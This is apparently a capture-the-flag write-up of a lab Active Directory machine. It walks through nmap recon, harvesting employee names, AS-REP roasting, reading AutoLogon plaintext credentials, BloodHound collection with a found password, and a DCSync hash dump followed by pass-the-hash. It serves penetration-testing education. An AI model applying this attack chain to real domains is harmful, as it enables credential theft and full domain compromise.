Beginner-friendly Active Directory machine teaching a classic real-world attack chain: harvest employee names
from a public website, generate AD username candidates, AS-REP Roast a user with pre-authentication disabled,
find plaintext credentials in the Windows AutoLogon registry key, then perform a DCSync attack via
GetChangesAll to dump all domain hashes and pass-the-hash as Administrator.
User Flag
5552b074550axxxxxxxxxxxxxxxxxxxx
Root Flag
01d83bce08bbxxxxxxxxxxxxxxxxxxxx
01Reconnaissance — Nmap
Full port scan against the target. The open ports immediately identify this as a Domain Controller.
nmap
$nmap-sC -sV -p---min-rate5000-oNnmap_full.txt10.129.35.22753/tcp open domain Simple DNS Plus80/tcp open http Microsoft IIS 10.088/tcp open kerberos-sec Microsoft Windows Kerberos389/tcp open ldap Active Directory (Domain: EGOTISTICAL-BANK.LOCAL)445/tcp open microsoft-ds SMB5985/tcp open http WinRM
DC confirmed: ports 88 (Kerberos) + 389 (LDAP) + 53 (DNS) = Domain Controller. Domain: EGOTISTICAL-BANK.LOCAL. Port 5985 (WinRM) open — valid credentials will give us a shell.
02Web Enumeration — Harvesting Employee Names
Browsing http://10.129.35.227 reveals the Egotistical Bank website. The About page lists the full names of team members — valuable for generating AD username candidates.
why this matters: AD usernames are almost always derived from real names (fsmith, fergus.smith, f.smith, etc.). Harvesting names from a public-facing site is a zero-noise recon technique — no login, no alerts.
03Username Generation — username-anarchy
username-anarchy takes real names and generates every common AD username format automatically — fsmith, fergus.smith, smithf, fergussmith, and dozens more per person.
When Kerberos pre-authentication is disabled on an account, anyone can request its TGT without knowing the password. The DC responds with a ticket encrypted with the account's password hash — which we can crack offline. No lockout risk, no network noise.
impacket-GetNPUsers — test all username candidates
fsmith is a regular user. Upload WinPEAS to enumerate privilege escalation paths — it checks hundreds of misconfigurations including stored credentials, vulnerable services, and registry keys.
AutoLogon: Windows stores auto-login credentials in plaintext at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. WinPEAS always checks here — it's a classic finding in real engagements too.
The registry shows svc_loanmanager but the actual AD account is svc_loanmgr — a common discrepancy.
Run BloodHound as svc_loanmgr to map AD attack paths.
BloodHound collection
$bloodhound-python-u'svc_loanmgr'-p'Moneymakestheworldgoround!'-dEGOTISTICAL-BANK.LOCAL-ns10.129.35.227-c All --zip
BloodHound finding:svc_loanmgr has GetChangesAll (DS-Replication-Get-Changes-All) over the domain — the permission DCs use to replicate with each other. This allows a full DCSync attack.
07Privilege Escalation — DCSync
GetChangesAll lets us impersonate a Domain Controller and pull every user's password hash from the domain. We run secretsdump remotely from Kali — no need to be on the machine.
key takeaways:
· Employee names on public sites → valid AD usernames — always enumerate web before touching AD
· AS-REP Roasting needs no credentials and causes no lockouts — test all username candidates
· AutoLogon stores plaintext passwords in the registry — WinPEAS finds this automatically
· GetChangesAll = DCSync = full domain compromise — flag it as critical in any assessment
· NTLM hashes are usable credentials — cracking is optional when you can pass-the-hash